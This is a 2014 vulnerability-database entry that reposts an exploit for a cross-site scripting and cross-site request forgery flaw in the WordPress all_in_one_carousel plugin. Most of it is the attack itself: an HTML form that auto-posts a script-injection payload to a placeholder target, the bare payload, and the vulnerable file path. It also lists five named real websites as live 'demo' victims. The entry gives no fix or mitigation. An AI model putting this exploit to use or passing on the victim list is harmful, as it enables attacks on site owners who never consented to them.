Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln

2014-05-05T00:00:00
ID SECURITYVULNS:DOC:30684
Type securityvulns
Reporter Securityvulns
Modified 2014-05-05T00:00:00

Description

Exploit :

<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability

</center><br><br> <html> <head> <title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability [IeDb TeaM]</title> </head><body> <form action=\"http://YourTarget.Com\" id=\"formid\" method=\"post\">

<input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br> <input type=\"submit\" value=\"Submit\"/> </form></body></html>

XSS Code : \"><script>alert(/IeDb.ir/)</script>

Vulnerable Page :

Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php

[+] Image : http://sectime.ir/myfiles/Xss-wp.png

D3m0 :

http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php

Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And ....

Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]